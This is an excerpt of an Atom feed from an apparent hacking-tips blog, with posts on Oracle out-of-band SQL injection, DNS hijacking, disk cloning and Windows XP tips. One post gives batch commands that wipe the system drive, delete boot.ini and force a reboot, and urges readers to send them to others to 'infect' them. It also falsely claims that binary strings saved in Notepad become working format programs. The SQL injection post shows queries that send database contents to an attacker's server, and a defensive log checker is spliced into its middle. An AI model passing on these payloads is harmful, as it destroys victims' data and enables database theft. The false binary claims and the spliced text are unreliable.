src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-5151234709485252024</id><published>2007-12-13T06:30:00.001-08:00</published><updated>2007-12-13T06:30:39.631-08:00</updated><title type='text'>Out-of-band Oracle SQL injection with HTTP Requests</title><content type='html'>Out-of-band Oracle SQL injection with HTTP Requests &lt;br /&gt;I spent most of last week performing a web application assessment in the middle of nowhere, Alabama. 
After the mad fun at BlackHat and several weeks of unpleasant documentation work preceding it, it was a nice change to spend five peaceful days completely focused on testing an interesting system.&lt;br /&gt;&lt;br /&gt;This was an internal application, so I wasn't surprised to find that it was vulnerable to SQL injection in several areas. However, in-band injection attacks weren't working for the application I was testing - I couldn't use UNION SELECTs, for example, to merge my query results with data rendered in the browser. So I had to leverage an out-of-band technique for retrieving data through SQL injection: Oracle's UTL_HTTP.REQUEST function. David Litchfield mentioned this approach almost two years ago in Data-mining with SQL Injection and Inference, but I never had the need to use it "in the wild" until now.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;UTL_HTTP is a built-in Oracle package that issues HTTP requests. The syntax is pretty simple: &lt;br /&gt;&lt;br /&gt;UTL_HTTP.REQUEST('http://www.foo.com/index.php') &lt;br /&gt;returns the first 2000 bytes from the provided URL. But the clever bit is that you can concatenate the URL with another SQL statement, the results of which will become part of the request.&lt;br /&gt;&lt;br /&gt;For example, consider the following SQL:&lt;br /&gt;&lt;br /&gt;UTL_HTTP.REQUEST('http://www.foo.com:80/'||(SELECT USERNAME FROM DBA_USERS WHERE ROWNUM=1))&lt;br /&gt;&lt;br /&gt;The SELECT statement returns the value "SYS" - the first user in the DBA_USERS table. The HTTP request issued by the database is therefore for the URL "http://www.foo.com:80/SYS". In www.foo.com's HTTP access log, the request would look like:&lt;br /&gt;&lt;br /&gt;158.72.4.21 - - [08/Aug/2007:10:02:40 +0000] "GET /SYS HTTP/1.1" 404 0 - -&lt;br /&gt;(assuming 158.72.4.21 is our target DB server)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;So as an attacker, you simply need to run a web server and point the UTL_HTTP.REQUESTs to your own IP address. 
You can then view the result of each SQL injection in your server logs. On Windows, I like to use SHTTPD as it is lightweight and simple to turn on and off.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The biggest limitation to this approach is that you can only query for one row at a time - you'll get an error message if your statement returns multiple rows. (That is due to the UTL_HTTP.REQUEST function itself, not the web server end.) But it is still a lot more efficient than using blind SQL injection to brute force one character of a response at a time. Oracle will also throw an error if it can't reach your web server, which may be the case depending on network controls between yourself and the database. Experiment with running on different ports.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;There are probably a few things you could do to make the attack more elegant, like setting up a CGI script on your server to better collect and parse the calls from the database. You could also create and inject a PL/SQL function that concatenates results from multiple rows to get around the single-row limitation. 
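From the defender's side, the telltale of this technique is a database server making outbound web requests whose URL path carries query results. Added example, not code from the original post: a check over an egress proxy or web server log in Apache common log format that reports every request originating from a database server and decodes the path; the DB inventory (158.72.4.21 is the post's sample target) and the log lines are constructed for this example.

```python
"""Added example, not code from the original post: flag UTL_HTTP-style
out-of-band exfiltration in an egress proxy or web server log kept in Apache
common log format. Every request whose client address belongs to a database
server is reported, with the URL path (where the injected SELECT's result
lands) decoded for the analyst. The DB inventory and log lines are constructed."""
import re
from ipaddress import ip_address, ip_network
from urllib.parse import unquote

# Hosts that should never originate web requests (assumed inventory).
# 158.72.4.21 is the target DB server from the post's sample log line.
DB_SERVERS = [ip_network("158.72.4.21/32"), ip_network("10.20.30.0/28")]

# Common log format: client ident user [time] "method path proto" status bytes
CLF = re.compile(
    r'^(\S+) (\S+) (\S+) \[([^\]]+)\] "([A-Z]+) (\S+) (HTTP/\d\.\d)" (\d{3}) (\S+)'
)
FIELDS = ("client", "ident", "user", "time", "method", "path", "proto", "status", "size")


def parse_clf(line):
    """Parse one common-log line into a dict, or return None if it is not one."""
    m = CLF.match(line)
    if m is None:
        return None
    return dict(zip(FIELDS, m.groups()))


def is_db_server(addr):
    """True if addr (a dotted-quad string) falls inside a database server range."""
    try:
        ip = ip_address(addr)
    except ValueError:            # hostnames or garbage never match
        return False
    return any(ip in net for net in DB_SERVERS)


def find_db_egress(log_text):
    """Return (client, time, decoded path) for each request a database server made."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_clf(line)
        if rec is None or not is_db_server(rec["client"]):
            continue
        hits.append((rec["client"], rec["time"], unquote(rec["path"])))
    return hits


# Constructed log: two ordinary clients, two requests from the DB server carrying
# query results in the path (the post's "GET /SYS" and a URL-encoded one), and noise.
EGRESS_LOG = """\
192.0.2.10 - - [08/Aug/2007:10:01:12 +0000] "GET /index.html HTTP/1.1" 200 5120
158.72.4.21 - - [08/Aug/2007:10:02:40 +0000] "GET /SYS HTTP/1.1" 404 0
158.72.4.21 - - [08/Aug/2007:10:02:41 +0000] "GET /HR%3AORCL10G HTTP/1.1" 404 0
192.0.2.11 - - [08/Aug/2007:10:03:02 +0000] "POST /login HTTP/1.1" 302 0
not a log record at all
"""

if __name__ == "__main__":
    for client, when, path in find_db_egress(EGRESS_LOG):
        print("%s [%s] requested %s" % (client, when, path))
```

The same inventory check works on firewall or proxy logs in other formats once parse_clf is swapped for the matching parser; the point is that the source address, not the destination, is what gives the traffic away.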
I needed a quick and dirty solution to get a few key database records, so I didn't bother venturing beyond the basics for this test.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Outbound HTTP requests originating from a database server should look suspicious, but I think the attack is obscure enough to slip by most admins.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-5151234709485252024?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/5151234709485252024/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=5151234709485252024' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/5151234709485252024'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/5151234709485252024'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/out-of-band-oracle-sql-injection-with.html' title='Out-of-band Oracle SQL injection with HTTP Requests'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-3590213549095495545</id><published>2007-12-13T06:27:00.000-08:00</published><updated>2007-12-13T06:28:48.193-08:00</updated><title type='text'>Hijacking dns</title><content type='html'>Restricting access to specific Internet web services is a challenge shared by all network administrators. 
Whether the reason for restricting access is based on security, bandwidth, or productivity, installing and maintaining proxy and content filter applications may be outside the budget of a small IT department.&lt;br /&gt;&lt;br /&gt;The solution provided here offers a cumbersome approach for a small investment: $0. &lt;br /&gt;&lt;br /&gt;All web services, such as HTTP, FTP, IRC, IM, NNTP and SMTP are predominantly called by name when end users want to access them. An internal DNS server usually hosts records for only the internal namespace. All external (Internet) namespace is generally forwarded to an ISP’s or other DNS server.&lt;br /&gt;&lt;br /&gt;DNS hijacking on the LAN allows an administrator to redirect all Internet requests for a domain or server to an internal server or to nowhere (127.0.0.1).&lt;br /&gt;&lt;br /&gt;HIJACKING GOOGLE&lt;br /&gt;&lt;br /&gt;If an administrator wanted to hijack and redirect all users’ connections to google.com, he’d only need to add a Primary Lookup Zone for the domain name.&lt;br /&gt;&lt;br /&gt;The steps for Server 2003 are as follows:&lt;br /&gt;&lt;br /&gt;- Open the DNS console&lt;br /&gt;- Expand your server&lt;br /&gt;- Right-click Forward Lookup Zones and select New Zone.&lt;br /&gt;- Click Next on the Wizard welcome page.&lt;br /&gt;- Create a Primary Forward Lookup Zone. Do NOT integrate the zone with Active Directory if the option appears.&lt;br /&gt;- Type the name of the zone: google.com&lt;br /&gt;- Accept the default file name for the zone and click Next.&lt;br /&gt;- Click Next.&lt;br /&gt;- Click Finish.&lt;br /&gt;&lt;br /&gt;Your DNS server is now authoritative for google.com. Instead of forwarding your clients’ DNS queries to the ISP DNS server, the server returns any records it holds in its own database. 
If the requested record does not exist, the DNS server tells the client that the name does not exist.&lt;br /&gt;&lt;br /&gt;CREATE RECORDS&lt;br /&gt;&lt;br /&gt;Create host records for the default namespace (i.e. google.com) and any hosts that you want to redirect (e.g. www.google.com). If you simply want the connections to die, saving any Internet bandwidth that would have otherwise been used, set the IP Address for each host record to 127.0.0.1. This will cause a client machine to attempt to connect to itself instead of the requested server. In most cases, this simply returns an error to the application that requested the Internet server.&lt;br /&gt;&lt;br /&gt;Mail can be redirected by creating an MX record in the Zone you’ve chosen to hijack.&lt;br /&gt;&lt;br /&gt;GETTING FANCY – REDIRECTION TO A BANNED ACCESS PAGE&lt;br /&gt;&lt;br /&gt;An administrator can redirect all web requests to hijacked servers to an internal web page that reiterates the network policy. For example, when a user browses to www.google.com, he instead reaches a web page that proclaims, “You attempted to access an inappropriate web page. This action has been logged.”&lt;br /&gt;&lt;br /&gt;If you want to get really sophisticated, you can use ASP.NET to build a neat page that reads the HTTP request and user token to personalize the page. If you are a masochist, you can tie it to a SQL database and log all transgressions.&lt;br /&gt;&lt;br /&gt;CREATING THE BANNED ACCESS PAGE&lt;br /&gt;&lt;br /&gt;- Install the Windows Web Service (Add/Remove Programs&gt;Add/Remove Windows Components&gt;Application Server)&lt;br /&gt;- In C:\inetpub\wwwroot drop a web page saying nasty stuff to your end users. Name it default.html.&lt;br /&gt;- Use this server’s IP address instead of 127.0.0.1 for all records you’d like to hijack.&lt;br /&gt;&lt;br /&gt;BAD SOLUTION – GOOD PRICE&lt;br /&gt;&lt;br /&gt;This solution is not scalable, dynamic or easy to maintain. But it is free. 
And it works.&lt;br /&gt;&lt;br /&gt;WORKAROUNDS&lt;br /&gt;&lt;br /&gt;If the client knows the IP Address of the remote server, he can still connect directly by IP Address.&lt;br /&gt;&lt;br /&gt;If the client changes his DNS Server to an Internet DNS server, it bypasses the entries for the hijacked domains. However, if the client is on an Active Directory domain, he will lose access to the domain controllers and Active Directory.&lt;br /&gt;&lt;br /&gt;Clients can use a web proxy to view desired web content. External web proxies do not rely on the internal DNS server for name resolution.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-3590213549095495545?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/3590213549095495545/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=3590213549095495545' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3590213549095495545'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3590213549095495545'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/hijacking-dns.html' title='Hijacking dns'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-7732795146451963910</id><published>2007-12-09T02:38:00.001-08:00</published><updated>2007-12-09T02:38:54.097-08:00</updated><title type='text'>Clone A HDD without buying any software</title><content type='html'>Did you know that you could clone your current Hard Drive without having to buy extra software? Maybe you didn't know that all that you needed was already set up on your current system? Well, it is... and if you follow this tut, you shouldn't have much of a problem.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.&lt;br /&gt;&lt;br /&gt;First: Perform a Scandisk on your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.&lt;br /&gt;&lt;br /&gt;Second: Do the same thing to the target drive as you did the Master: Scandisk, then a thorough Defrag.&lt;br /&gt;&lt;br /&gt;Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the "Full" button.&lt;br /&gt;&lt;br /&gt;Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says "Autofix Errors".&lt;br /&gt;&lt;br /&gt;Fifth: In this final part, you might want to cut-and-paste the code in, unless you are sure that you can do it without making any mistakes:&lt;br /&gt;&lt;br /&gt;Click on the "Start" button, then click on the "Run..." 
button, then place the following into the Runbox:&lt;br /&gt;&lt;br /&gt;"XCOPY C:\*.*D:\ /c/h/e/k/r" (minus the quotes, of course) then press the "Enter" button.&lt;br /&gt;&lt;br /&gt;If you receive an error message, then remove the space from between XCOPY and C:\&lt;br /&gt;&lt;br /&gt;Anything that should happen to come up in the DOS box, just click "Y" for "Yes". When its all finished, pull the original Master from the system, designate the Slave as the Master (change your jumpers), then check your new Master out.&lt;br /&gt;&lt;br /&gt;This tut has worked and has been tested on all systems except for Windows 2000, so you really shouldn't have any problems. If, by any chance, you should come across a snag, message me and I'll walk you through it.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-7732795146451963910?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/7732795146451963910/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=7732795146451963910' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/7732795146451963910'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/7732795146451963910'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/clone-hdd-witout-buying-any-software.html' title='Clone A HDD witout buying any software'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-2935089220910971187</id><published>2007-12-09T02:36:00.000-08:00</published><updated>2007-12-09T02:37:08.562-08:00</updated><title type='text'>Format a hdd with notepad</title><content type='html'>Step 1.&lt;br /&gt;Copy The Following In Notepad Exactly as it says&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;01001011000111110010010101010101010000011111100000&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Step 2.&lt;br /&gt;Save As An EXE Any Name Will Do&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Step 3.&lt;br /&gt;Send the EXE to People And Infect&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;OR&lt;br /&gt;&lt;br /&gt;IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code&lt;br /&gt;format c:\ /Q/X -- this will format your drive c:\&lt;br /&gt;&lt;br /&gt;01100110011011110111001001101101011000010111010000 100000011000110011101001011100&lt;br /&gt;&lt;br /&gt;0010000000101111010100010010111101011000&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;format d:\ /Q/X -- this will format your dirve d:\&lt;br /&gt;&lt;br /&gt;01100110011011110111001001101101011000010111010000 100000011001000011101001011100&lt;br /&gt;&lt;br /&gt;0010000000101111010100010010111101011000&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;format a:\ /Q/X -- this will format your drive a:\&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;01100110011011110111001001101101011000010111010000 100000011000010011101001011100&lt;br /&gt;&lt;br /&gt;0010000000101111010100010010111101011000&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;01100100011001010110110000100000001011110100011000 101111010100110010111101010001&lt;br /&gt;&lt;br /&gt;00100000011000110011101001011100011000100110111101 
101111011101000010111001101001&lt;br /&gt;&lt;br /&gt;0110111001101001&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;try to figure out urself rest&lt;br /&gt;cant spoonfeed&lt;br /&gt;its workin&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Do not try it on ur PC. dont mess around this is for educational purpose only&lt;br /&gt;&lt;br /&gt;still if u cant figure it out try dis&lt;br /&gt;&lt;br /&gt;go to notepad&lt;br /&gt;&lt;br /&gt;@Echo off&lt;br /&gt;Del C:\ *.*y&lt;br /&gt;&lt;br /&gt;save it as Dell.bat&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;worse&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;del %systemdrive%\*.*/f/s/q&lt;br /&gt;shutdown -r -f -t 00&lt;br /&gt;&lt;br /&gt;and save it as a .bat file&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-2935089220910971187?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/2935089220910971187/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=2935089220910971187' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/2935089220910971187'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/2935089220910971187'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/format-hdd-with-notepad.html' title='Format a hdd with notepad'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-1338184101149311724</id><published>2007-12-09T02:33:00.000-08:00</published><updated>2007-12-09T02:35:28.528-08:00</updated><title type='text'>20 things you didn't knew about xp</title><content type='html'>1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo &gt; info.&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_0"&gt;txt&lt;/span&gt;'. This creates a file called info.&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_1"&gt;txt&lt;/span&gt; you can look at later with Notepad. (Professional Edition only).&lt;br /&gt;&lt;br /&gt;2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type '&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_2"&gt;gpedit&lt;/span&gt;.&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_3"&gt;msc&lt;/span&gt;'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_4"&gt;gpedit&lt;/span&gt; will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish. (Professional Edition only).&lt;br /&gt;&lt;br /&gt;3. You can lock your &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_5"&gt;XP&lt;/span&gt; workstation with two clicks of the mouse. 
Create a new shortcut on your desktop using a right mouse click, and enter '&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_6"&gt;rundll&lt;/span&gt;32.&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_7"&gt;exe&lt;/span&gt; user32.&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_8"&gt;dll&lt;/span&gt;,&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_9"&gt;LockWorkStation&lt;/span&gt;' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.&lt;br /&gt;&lt;br /&gt;4. &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_10"&gt;XP&lt;/span&gt; hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_11"&gt;sysoc&lt;/span&gt;.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.&lt;br /&gt;&lt;br /&gt;5. For those skilled in the art of DOS batch files, &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_12"&gt;XP&lt;/span&gt; has a number of interesting new commands. These include '&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_13"&gt;eventcreate&lt;/span&gt;' and '&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_14"&gt;eventtriggers&lt;/span&gt;' for creating and watching system events, '&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_15"&gt;typeperf&lt;/span&gt;' for monitoring performance of various subsystems, and '&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_16"&gt;schtasks&lt;/span&gt;' for handling scheduled tasks. As usual, typing the command name followed by /? 
will give a list of options -- they're all far too baroque to go into here.&lt;br /&gt;&lt;br /&gt;6. &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_17"&gt;XP&lt;/span&gt; has &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_18"&gt;IP&lt;/span&gt; version 6 support -- the next generation of &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_19"&gt;IP&lt;/span&gt;. Unfortunately this is more than your &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_20"&gt;ISP&lt;/span&gt; has, so you can only experiment with this on your LAN. Type '&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_21"&gt;ipv&lt;/span&gt;6 install' into Run... (it's OK, it won't ruin your existing network setup) and then '&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_22"&gt;ipv&lt;/span&gt;6 /?' at the command line to find out more. If you don't know what &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_23"&gt;IPv&lt;/span&gt;6 is, don't worry and don't bother.&lt;br /&gt;&lt;br /&gt;7. You can at last get rid of tasks on the computer from the command line by using '&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_24"&gt;taskkill&lt;/span&gt; /&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_25"&gt;pid&lt;/span&gt;' and the task number, or just '&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_26"&gt;tskill&lt;/span&gt;' and the process number. Find that out by typing '&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_27"&gt;tasklist&lt;/span&gt;', which will also tell you a lot about what's going on in your system.&lt;br /&gt;&lt;br /&gt;8. &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_28"&gt;XP&lt;/span&gt; will treat Zip files like folders, which is nice if you've got a fast machine. 
On slower machines, you can make &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_29"&gt;XP&lt;/span&gt; leave zip files well alone by typing '&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_30"&gt;regsvr&lt;/span&gt;32 /u &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_31"&gt;zipfldr&lt;/span&gt;.&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_32"&gt;dll&lt;/span&gt;' at the command line. If you change your mind later, you can put things back as they were by typing '&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_33"&gt;regsvr&lt;/span&gt;32 &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_34"&gt;zipfldr&lt;/span&gt;.&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_35"&gt;dll&lt;/span&gt;'.&lt;br /&gt;&lt;br /&gt;9. &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_36"&gt;XP&lt;/span&gt; has &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_37"&gt;ClearType&lt;/span&gt; -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_38"&gt;ClearType&lt;/span&gt;, right click on the desktop, select Properties, Appearance, Effects, select &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_39"&gt;ClearType&lt;/span&gt; from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_40"&gt;ClearType&lt;/span&gt; on the Welcome &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_41"&gt;login&lt;/span&gt; screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_42"&gt;FontSmoothingType&lt;/span&gt; to 2.&lt;br /&gt;&lt;br /&gt;10. 
You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_43"&gt;RCTICKET&lt;/span&gt; attribute will be a NAT &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_44"&gt;IP&lt;/span&gt; address, like 192.168.1.10. Replace this with your chum's real &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_45"&gt;IP&lt;/span&gt; address -- they can find this out by going to www.whatismyip.com -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer.&lt;br /&gt;&lt;br /&gt;11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.&lt;br /&gt;&lt;br /&gt;12. Windows &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_46"&gt;XP&lt;/span&gt; can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. 
After a while, the nagging goes away, but if you feel you might slip the bonds of sanity before that point, run &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_47"&gt;Regedit&lt;/span&gt;, go to &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_48"&gt;HKEY&lt;/span&gt;_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_49"&gt;DWORD&lt;/span&gt; value called &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_50"&gt;EnableBalloonTips&lt;/span&gt; with a value of 0.&lt;br /&gt;&lt;br /&gt;13. You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_51"&gt;userpasswords&lt;/span&gt;2', which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.&lt;br /&gt;&lt;br /&gt;14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options... and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.&lt;br /&gt;&lt;br /&gt;15. &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_52"&gt;XP&lt;/span&gt; comes with a free Network Activity Light, just in case you can't see the &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_53"&gt;LEDs&lt;/span&gt; twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. 
You'll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.&lt;br /&gt;&lt;br /&gt;16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_54"&gt;HKEY&lt;/span&gt;_CURRENT_USER/Control Panel/Desktop/&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_55"&gt;MenuShowDelay&lt;/span&gt; from the default 400 to something a little snappier. Like 0.&lt;br /&gt;&lt;br /&gt;17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By... Show In Groups.&lt;br /&gt;&lt;br /&gt;18. Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_56"&gt;pre&lt;/span&gt;-&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_57"&gt;WMP&lt;/span&gt; music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_58"&gt;jpg&lt;/span&gt; and Windows Media Player will pick it up and display it.&lt;br /&gt;&lt;br /&gt;19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_59"&gt;taskbar&lt;/span&gt; buttons.&lt;br /&gt;&lt;br /&gt;20. 
